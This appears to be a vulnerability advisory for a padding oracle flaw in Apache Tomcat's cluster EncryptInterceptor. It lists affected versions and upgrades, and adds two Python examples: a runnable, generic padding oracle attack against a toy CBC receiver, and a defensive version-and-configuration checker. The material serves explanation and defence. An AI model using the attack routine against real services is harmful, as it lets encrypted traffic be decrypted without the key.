Apache · Apache Tomcat · CVE-2026-29146
**Name of the Vulnerable Software and Affected Versions**
Apache Tomcat versions 11.0.0-M1 through 11.0.18
Apache Tomcat versions 10.0.0-M1 through 10.1.52
Apache Tomcat versions 9.0.13 through 9.0.115
Apache Tomcat versions 8.5.38 through 8.5.100
Apache Tomcat versions 7.0.100 through 7.0.109
**Description**
A padding oracle vulnerability exists in the `EncryptInterceptor` (the Tribes cluster interceptor that encrypts replication traffic between nodes) in its default configuration, which uses CBC (Cipher Block Chaining) mode with padding. The interceptor's error reporting lets a remote attacker distinguish a padding failure from any other decryption failure. That distinction is the oracle: by submitting modified ciphertexts and observing which error comes back, the attacker can mount a padding oracle attack and recover the plaintext of protected cluster messages without knowing the encryption key.
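The flaw class in the description, as an added illustration that is not Tomcat's code and not the reported exploit: a CBC receiver whose response reveals whether the padding or a later check failed, and the generic padding oracle attack that turns that distinction into plaintext. The block cipher is a deliberately weak toy Feistel network over SHA-256 so the script runs offline on the standard library only; the keys, the sample message and the receiver's response strings are all constructed for the example. The attack depends only on CBC structure and on the oracle, so it proceeds identically against AES-CBC.

```python
"""Padding-oracle illustration (added example; not Tomcat's code)."""
import hashlib
import os

BLOCK = 16
ENC_KEY = b"toy-enc-key"      # constructed demo keys, not real secrets
TAG_KEY = b"toy-tag-key"
PLAINTEXT = b"session replication payload"   # constructed sample message


def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def _round(key, half, rnd):
    # toy round function: 8 bytes of SHA-256 over key, round number, half block
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:8]


def block_encrypt(key, blk):
    # 4-round Feistel network on a 16-byte block (insecure toy, invertible)
    l, r = blk[:8], blk[8:]
    for rnd in range(4):
        l, r = r, _xor(l, _round(key, r, rnd))
    return l + r


def block_decrypt(key, blk):
    l, r = blk[:8], blk[8:]
    for rnd in reversed(range(4)):
        l, r = _xor(r, _round(key, l, rnd)), l
    return l + r


def pad(data):
    # PKCS#5/#7-style padding: n bytes of value n, always at least one
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n


def unpad(data):
    n = data[-1]
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]


def cbc_encrypt(key, pt, iv=None):
    iv = iv or os.urandom(BLOCK)
    out, prev = [iv], iv
    for i in range(0, len(pt), BLOCK):
        prev = block_encrypt(key, _xor(pt[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)


def cbc_decrypt_raw(key, ct):
    blocks = [ct[i:i + BLOCK] for i in range(0, len(ct), BLOCK)]
    return b"".join(_xor(block_decrypt(key, blocks[i]), blocks[i - 1])
                    for i in range(1, len(blocks)))


def tag(msg):
    return hashlib.sha256(TAG_KEY + msg).digest()[:16]


def seal(msg):
    # MAC-then-encrypt: the receiver must unpad before it can check the tag
    return cbc_encrypt(ENC_KEY, pad(msg + tag(msg)))


def leaky_receiver(ct):
    """Vulnerable: the response says *which* check failed."""
    try:
        body = unpad(cbc_decrypt_raw(ENC_KEY, ct))
    except ValueError:
        return "bad padding"
    return "ok" if tag(body[:-16]) == body[-16:] else "bad tag"


def hardened_receiver(ct):
    """Same checks, but every failure yields one indistinguishable response."""
    return "ok" if leaky_receiver(ct) == "ok" else "decryption failed"


def padding_oracle_attack(oracle, ct):
    """Recover the padded plaintext of ct using only the oracle's responses."""
    blocks = [ct[i:i + BLOCK] for i in range(0, len(ct), BLOCK)]
    recovered = b""
    for i in range(1, len(blocks)):
        prev, target = blocks[i - 1], blocks[i]
        inter = bytearray(BLOCK)             # will hold D_K(target)
        for pos in range(BLOCK - 1, -1, -1):
            want = BLOCK - pos               # padding value we try to force
            forged = bytearray(BLOCK)
            for j in range(pos + 1, BLOCK):
                forged[j] = inter[j] ^ want  # already-known bytes -> `want`
            hits = []
            for guess in range(256):
                forged[pos] = guess
                if oracle(bytes(forged) + target) == "bad padding":
                    continue
                if pos == BLOCK - 1:         # rule out a 0x02 0x02 false hit
                    alt = bytearray(forged)
                    alt[pos - 1] ^= 1
                    if oracle(bytes(alt) + target) == "bad padding":
                        continue
                hits.append(guess)
            if len(hits) != 1:
                raise RuntimeError("oracle does not distinguish padding errors")
            inter[pos] = hits[0] ^ want
        recovered += _xor(inter, prev)
    return recovered


def demo():
    """Attack both receivers; returns (plaintext leaked, hardened blocked?)."""
    ct = seal(PLAINTEXT)
    leaked = padding_oracle_attack(leaky_receiver, ct)
    try:
        padding_oracle_attack(hardened_receiver, ct)
        blocked = False
    except RuntimeError:
        blocked = True
    return unpad(leaked)[:-16], blocked


if __name__ == "__main__":
    msg, blocked = demo()
    print("recovered via leaky oracle:", msg)
    print("attack stopped by hardened receiver:", blocked)
```

Against `leaky_receiver` the attack recovers the full message with at most 256 queries per byte and no knowledge of `ENC_KEY`; against `hardened_receiver` every guess looks the same and the attack cannot make progress. The hardened receiver shows only the property the attack needs (distinguishable failures), not the change made in Tomcat; note that collapsing error messages is fragile, since timing or message-length differences can re-create the oracle, which is why authenticated encryption is the usual replacement for CBC with padding.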
**Recommendations**
Upgrade versions 11.0.0-M1 through 11.0.18 to 11.0.19.
Upgrade versions 10.0.0-M1 through 10.1.52 to 10.1.53.
Upgrade versions 9.0.13 through 9.0.115 to 9.0.116.
At the time of writing there is no release containing a fix for Apache Tomcat versions 8.5.38 through 8.5.100 or 7.0.100 through 7.0.109. Both branches have reached end of life, so installations on them should migrate to a supported branch (9.0.116 or later, 10.1.53 or later, or 11.0.19 or later).
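A check a practitioner can run against a deployment, added here as an example rather than anything shipped with Tomcat: it maps a version string as printed by `version.sh`/`version.bat` (or the bare number) onto the affected ranges listed above, sorting milestone builds such as `11.0.0-M3` before the final `11.0.0`, and looks for `EncryptInterceptor` in `server.xml` while ignoring commented-out configuration. The sample `server.xml` fragment is constructed for the example; the interceptor class name is Tomcat's real one.

```python
"""Affected-version and configuration check (added example; not a Tomcat tool)."""
import re

# (first affected, last affected, fixed release or None), per the advisory text above
AFFECTED = [
    ("11.0.0-M1", "11.0.18", "11.0.19"),
    ("10.0.0-M1", "10.1.52", "10.1.53"),
    ("9.0.13", "9.0.115", "9.0.116"),
    ("8.5.38", "8.5.100", None),
    ("7.0.100", "7.0.109", None),
]

_VER = re.compile(r"(\d+)\.(\d+)\.(\d+)(?:-M(\d+))?")
_INTERCEPTOR = "org.apache.catalina.tribes.group.interceptors.EncryptInterceptor"

# constructed sample server.xml fragment for the example
SAMPLE_SERVER_XML = """
<Cluster className="org.apache.catalina.ha.tcp.SimpleTcpCluster">
  <Channel className="org.apache.catalina.tribes.group.GroupChannel">
    <!-- <Interceptor className="org.apache.catalina.tribes.group.interceptors.TcpFailureDetector"/> -->
    <Interceptor className="org.apache.catalina.tribes.group.interceptors.EncryptInterceptor"
                 encryptionKey="0123456789abcdef0123456789abcdef"/>
  </Channel>
</Cluster>
"""


def parse_version(text):
    """Return a sortable tuple; a milestone M<n> sorts below the finished x.y.z."""
    m = _VER.search(text)
    if not m:
        raise ValueError("no Tomcat version found in %r" % text)
    major, minor, patch, milestone = m.groups()
    # fourth field: 0 for pre-release milestones, 1 for the final build
    return (int(major), int(minor), int(patch),
            0 if milestone else 1, int(milestone or 0))


def check(version_text):
    """Map a version string onto the advisory's ranges.

    Returns ("affected", advice) or ("not affected", None).
    """
    v = parse_version(version_text)
    for lo, hi, fix in AFFECTED:
        if parse_version(lo) <= v <= parse_version(hi):
            advice = "upgrade to %s" % fix if fix else "no fixed release available"
            return ("affected", advice)
    return ("not affected", None)


def uses_encrypt_interceptor(server_xml):
    """True if server.xml configures EncryptInterceptor outside XML comments."""
    live = re.sub(r"<!--.*?-->", "", server_xml, flags=re.S)
    return _INTERCEPTOR in live


if __name__ == "__main__":
    for line in ("Apache Tomcat/9.0.100", "11.0.0-M3", "8.5.100", "10.1.53"):
        print(line, "->", check(line))
    print("EncryptInterceptor configured:", uses_encrypt_interceptor(SAMPLE_SERVER_XML))
```

Feed `check()` the `Server version:` line from `bin/version.sh` and `uses_encrypt_interceptor()` the contents of `conf/server.xml`; a host is exposed only when both report true, since the interceptor is not enabled by default. The comment stripping matters because a commented-out `<Interceptor>` element is a common leftover in templated configurations.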